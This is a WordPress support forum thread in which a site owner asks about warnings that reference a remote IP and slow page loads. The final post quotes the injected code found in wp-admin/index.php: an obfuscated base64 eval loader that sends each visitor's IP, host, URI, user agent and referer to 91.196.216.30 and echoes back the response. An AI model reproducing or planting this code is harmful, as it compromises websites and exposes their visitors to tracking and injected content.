WordPress.org

Ready to get started?Download WordPress

Forums

file_get_contents error - Urgent, please help! (6 posts)

  1. CarolineElisa
    Member
    Posted 3 years ago #

    Typically, on the day we need to go live I am suddenly getting an error in the dashboard and displaying at the bottom of every page! Also, the site is incredibly slow to load:
    storybox.co.nz/wordpress

    The error in the dashboard:
    Warning: file_get_contents(http://91.196.216.30/bt.php?ip=202.137.246.69&host=www.storybox.co.nz&uri=%2Fwordpress%2Fwp-admin%2Findex.php&ua=mozilla%2F5.0+%28macintosh%3B+intel+mac+os+x+10.6%3B+rv%3A7.0.1%29+gecko%2F20100101+firefox%2F7.0.1&ref=http%3A%2F%2Fwww.storybox.co.nz%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Danything_slider) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 503 Service Temporarily Unavailable in /home/www/storybox.co.nz/public/wordpress/wp-admin/index.php on line 58

    I have tried deleting all my child theme php files, but the problem persists. I am using a custom child theme of Hybrid 0.9

    I only have one plugin - AnythingSlider but am scared to deactivate it and lose all the data. Also, it was working fine until today.

    Hoping someone can help!

    Thanks,
    Caroline

  2. esmi
    Forum Moderator
    Posted 3 years ago #

    Try:
    - deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    - switching to the Twenty Eleven theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  3. CarolineElisa
    Member
    Posted 3 years ago #

    Yay, it's gone! Thanks for the tip on checking via FTP @esmi. There was a stray file in there causing the problem.

    Site still slow to load, but must be another issue.

  4. CarolineElisa
    Member
    Posted 3 years ago #

    Oh no, the issue is back after updating Anything Slider! Please help, the site is now live: http://www.storybox.co.nz/

    I have no other plugins, and even with the TwentyEleven theme activated I still get the following error in my dashboard and at the bottom of every page. The site is also super slow to load.

    I have now re-installed version 0.6.4.2 of the plugin, but the error remains!:

    Warning: file_get_contents(http://91.196.216.30/bt.php?ip=203.211.89.238&host=www.storybox.co.nz&uri=%2F&ua=mozilla%2F5.0+%28macintosh%3B+intel+mac+os+x+10_6_8%29+applewebkit%2F535.1+%28khtml%2C+like+gecko%29+chrome%2F14.0.835.202+safari%2F535.1&ref=) [function.file-get-contents]: failed to open stream: Connection timed out in /home/www/storybox.co.nz/public/index.php on line 18

  5. CarolineElisa
    Member
    Posted 3 years ago #

    Yikes, again think I fixed it...

  6. CarolineElisa
    Member
    Posted 3 years ago #

    Ok, so the original error is back!

    Line 55 in my index.php file under /wp-admin is:

    <?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

    Same code repeated on line 58 and 59...

    Where has this come from? Should this even be there?!

    Hoping someone can help. Thanks!

Topic Closed

This topic has been closed to new replies.

About this Topic